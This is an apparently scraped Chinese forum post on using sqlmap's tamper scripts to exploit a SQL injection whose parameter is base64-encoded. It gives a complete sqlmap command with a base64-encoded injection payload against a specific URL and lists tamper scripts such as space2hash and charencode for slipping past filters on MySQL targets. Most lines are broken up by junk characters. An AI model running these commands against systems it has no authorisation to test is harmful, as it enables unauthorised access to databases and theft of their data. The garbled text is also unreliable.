WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?/ K& h3 n$ U+ P7 x! @
. `. S; {3 [7 q/ e- w, Psqlmap的tamper里有个base64encode.py. L" d3 I3 K5 L- [+ q
/ }9 J7 k, A# B( m
使用如下
. o. V/ S& B, Z. V d* E* x ?$ F$ A) [4 O0 j; `, }
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
! N/ R: b! w. m) Z- k, D1 U4 O; Y* L% C3 @, P
3 S: U3 h; t: P# [
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
' r5 Y% I# O' z- H8 \5 n. z; }! ^: |/ m/ L
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
( j& i8 e8 }: W2 d6 O4 G. p
i7 F1 z$ t5 l% c, C0 I# ]& Kspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
$ w/ j+ o3 Y5 |- M0 C" j1 Cspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入 K+ t' X+ s+ B% U( _, r
首先确定目标数据库版本,然后选择相应的脚本。
- R: e* \/ L5 w: d1 W' r" d) [-v 3 --batch --tamper "space2hash.py"8 V' G/ B3 B }7 D
. {5 v2 N- O2 d3 t1 `; H$ W D3 Q$ z
还有其他一些插件:
1 o& _0 f o$ F& E2 F. xencodes编码 ——charencode.py
" l4 `, ^+ O- c1 S2 g! t. p) ebase64编码 —— base64encode.py
! `- X9 v1 q- S5 H替换空格和关键字 —— halfversionedmorekeywords.py* U( F+ Z0 O* B+ P
| 5 L! l1 @! K; J4 `% @; d: B
- h" G4 ~& L2 Y9 h6 @3 R! W) ~
- K- l' ~9 ^! w6 q' m# h! u* ?6 U8 y8 N0 J0 q4 ]4 k
|